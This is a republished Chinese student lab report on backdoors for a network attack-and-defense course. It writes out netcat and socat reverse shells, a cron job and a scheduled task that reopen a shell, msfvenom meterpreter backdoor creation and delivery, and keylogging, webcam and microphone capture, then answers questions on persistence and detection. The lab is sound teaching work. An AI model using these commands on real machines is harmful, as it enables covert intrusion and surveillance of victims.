当前位置: 首页 > news >正文

20232317 2025-2026-1《网络与系统攻防技术》实验二实验报告

1.实验内容
(1)使用netcat获取主机操作Shell,cron启动某项任务(任务自定)

PS:cron是linux下用来周期性的执行某种任务或等待处理某些事件的一个守护进程

(2)使用socat获取主机操作Shell, 任务计划启动

(3)使用MSF meterpreter(或其他软件)生成可执行文件(后门),利用ncat或socat传送到主机并运行获取主机Shell

(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容的后门,并尝试提权

(5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

2.实验内容
(一)使用netcat获取主机操作Shell,启动cron
kali获取windows的shell
在Kali终端输入ifconfig查找IP地址
屏幕截图 2025-10-20 161536
在kali中输入nc -l -p 12150监听12150端口
windows在cmd中输入ncat.exe -e cmd.exe 192.168.78.128 12150反弹连接kali
之后回到kali就可以看到windows的命令提示
屏幕截图 2025-10-20 162536

屏幕截图 2025-10-20 162544

Windows获取Kali的shell
在windows下输入ipconfig查询windows的ip

windows输入ncat.exe -l -p 12150开始监听

kali输入nc 172.16.229.158 12150 -e /bin/sh反弹连接win

此时回到windows,可以发现打开了kali的shell,可以正常输入命
屏幕截图 2025-10-22 162454
屏幕截图 2025-10-22 162508

在虚拟机中启动cron并在主机监听
首先在虚拟机上用crontab -e指令编辑一条定时任务,输入2表示选择vim编辑器

在最后一行添加48* * * * nc 172.16.229.158 12150 -e /bin/sh,即在每个小时的第48分钟反向连接Windows主机的12150端口

屏幕截图 2025-10-22 164938
在每个小时的第48分钟,在主机输入ncat.exe -l -p 12150打开监听即可

可以在主机获取kali的shell
屏幕截图 2025-10-22 215846

二)使用socat获取主机操作Shell,任务计划启动
在Windows中按Win+R,再输入compmgmt.msc打开计算机管理
屏幕截图 2025-10-22 165224
在系统工具中的任务计划程序中创建任务
屏幕截图 2025-10-22 165335
设置任务名称
屏幕截图 2025-10-22 191558
设置一个触发器
屏幕截图 2025-10-22 191703
在新建操作前我们下载一个socat,并且解压使用。

此时我们新建操作,操作设置为启动程序socat.exe,并添加参数tcp-listen:12150 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口12150,同时把cmd.exe的stderr重定向
屏幕截图 2025-10-22 192821
屏幕截图 2025-10-22 192924
设置好后我们按下Win+L将电脑锁屏
在Kali中输入命令socat - tcp:192.168.1.103:12150

屏幕截图 2025-10-22 193217

我们可以看到调用出来了windows的shell,证明我们的操作成功了
(三)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
在Kali上生成后门可执行程序20191215_backdoor.exe
在kali虚拟机输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.78.128 LPORT=8888 -f exe > backdoor20232317.exe
屏幕截图 2025-10-22 194643
在Windows主机上启动netcat,输入命令 ./nc.exe -l -p 410 > “D:\backdoor20232317.exe”
屏幕截图 2025-10-22 195659

在kali虚拟机中输入nc 192.168.1.103 410 < backdoor20232317.exe,将生成的后门程序传过去
屏幕截图 2025-10-22 200350
屏幕截图 2025-10-22 200449

在kali上使用msfconsole指令进入msf控制台
屏幕截图 2025-10-22 201713

对msf控制台进行配置
依次输入以下命令

use exploit/multi/handler #使用监听模块,设置payload
set payload windows/meterpreter/reverse_tcp #使用和生成后门程序时相同的payload
set LHOST 192.168.78.128 #KaliIP,和生成后门程序时指定的IP相同
set LPORT 1215
屏幕截图 2025-10-22 203448
接着输入exploit进行监听,在Windows在打开backdoor20232317.exe后成功获取到Windows的shell
屏幕截图 2025-10-22 222422
(四)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

在Meterpreter会话中输入常用的后渗透命令
record_mic #从目标主机的默认麦克风录制音频
screenshot #表示获取目标主机当前屏幕的截图,保存为图片文件
webcam_snap #表示通过目标主机的摄像头拍摄一张照片
keyscan_start #表示开始捕获目标主机的键盘输入(键盘记录)
keyscan_stop #手动停止
keyscan_dump #导出键盘记录缓存区的内容,将目标机上的按键记录输出在终端
屏幕截图 2025-10-22 222758
在对应目录下查看获取的文件
屏幕截图 2025-10-22 210109(1)
(五)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell
输入指令:​msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.78.128 LPORT=8888 -x pwn20232317 -f elf > pwnh
输入chmod +x ./pwnh添加执行权限
屏幕截图 2025-10-22 212711

另起一个shell,输入msfconsole,再次进行监听配置,输入命令如下:
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp #注意这里需要使用linux而非windows
set LHOST 192.168.78.128 #这里是Kali虚拟机的IP地址
set LPORT 8888
屏幕截图 2025-10-22 213343
输入exploit开始监听,打开另一个终端,输入./pwnh运行恶意文件,发现之前的终端已经可以获取到shell了
屏幕截图 2025-10-22 213454

3.问题及解决方案
问题一:不知道关闭kali虚拟机防火墙
解决方案:查询学长的实验报告找到方法:通过下载安装ufw这一软件成功关闭了kali的防火墙
屏幕截图 2025-10-20 173213
屏幕截图 2025-10-20 173536
4.学习感悟
这次实验内容很多,也让我大开眼界。我可以想黑客一样去远程操作别的电脑。虽然现实不会这么轻易,但还是让我感到非常有趣。我还认识到后门的作用。通过后面,我们可以调用许多程序,例如摄像头、电脑音频、击键记录、截屏等。通过这次实验,我也意识到平常也要注意网络安全,要保护好个人的隐私信息。
总之,通过这次实验,我对后面技术有了一个初步的了解。以后,我要继续学习并提高我的编程能力。

5.回答问题

(1)例举你能想到的一个后门进入到你系统中的可能方式?
利用 Web 应用漏洞,例如文件上传、SQL 注入,上传 WebShell到服务器,获取初步控制权后部署持久化后门。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
Windows
注册表:写入Run键值(如HKLM...\CurrentVersion\Run);
计划任务:通过schtasks创建开机 / 定时触发任务;
系统服务:注册为 “自动” 启动的服务(如sc create命令);
启动文件夹:放入C:\Users\用户名...\Startup。
Linux
定时任务:crontab -e或/etc/crontab添加执行规则;
系统服务:systemd(.service文件)或sysvinit(/etc/init.d/脚本);
Shell 配置:编辑~/.bashrc//etc/bashrc添加后门命令;
/etc/rc.local:写入后门路径实现开机执行。
(3)Meterpreter有哪些给你映像深刻的功能?
进程迁移:注入explorer.exe等系统进程伪装;
远程控制:截图、获取桌面(无需 RDP);
信息窃取:键盘记录、提取 WiFi / 浏览器密码;
音视频监控:调用摄像头录像、麦克风录音;
持久化:自动创建自启动后门;
日志清除:删除 Windows/Linux 系统日志掩盖痕迹。
(4)如何发现自己有系统有没有被安装后门?
1.查进程:Win 用任务管理器(看未知 / 高资源进程),Linux 用ps aux(查/tmp目录进程);
2.查启动项:Win 查注册表 / 计划任务,Linux 查crontab/systemd服务;
3.查网络:Win 用netstat -ano,Linux 用ss -tulnp,找未知远程连接;
4.查日志:Win 看事件查看器(安全 / 系统日志),Linux 查/var/log/auth.log;
5.工具辅助:用杀毒软件(火绒、ClamAV)或专用工具(rkhunter、Process Hacker)扫描。

http://www.hskmm.com/?act=detail&tid=36949

相关文章:

  • 第2天(简单题中等题 取余、因数与倍数、数组 矩阵、数组 字符串)
  • python笔记
  • 20232326 2025-2026-1 《网络与系统攻防技术》实验二实验报告
  • 20232412 2025-2026-1 《网络与系统攻防技术》实验二实验报告
  • 20232403 2025-2026-1 《网络与系统攻防技术》实验二实验报告
  • NOIP2024
  • 20232415 2025-2026-1 《网络与系统攻防技术》 实验二实验报告
  • 结对项目:四则运算生成器
  • CSP-S2023
  • Spring Boot 中全面解决跨域请求
  • OpenTelemetry语义约定:规范可观测性数据,提升系统洞察力
  • 拓展欧几里得算法
  • 两两交换链表中的节点-leetcode
  • 算法第二章实践作业
  • 解决homebrew下载报错问题
  • 软考中级学习总结(5)
  • 软考中级学习总结(4)
  • 每日反思(2025_10_22)
  • docker: Error response from daemon: failed to set up container networking 解决办法
  • 实验2 现代C++编程初体验
  • CSP-S36
  • 新学期每日总结(第13天)
  • GCM(Galois/Counter Mode) 认证加密算法实现
  • 【学习笔记】slope-trick
  • 10.13-10.19学习做题笔记
  • 2025.10.22
  • yny计数题记录
  • 20232404 2025-2026-2 《网络与系统攻防技术》实验二实验报告
  • 1020302118兰逸霏的第一次作业
  • ubuntu 25.10 修改源 - ldx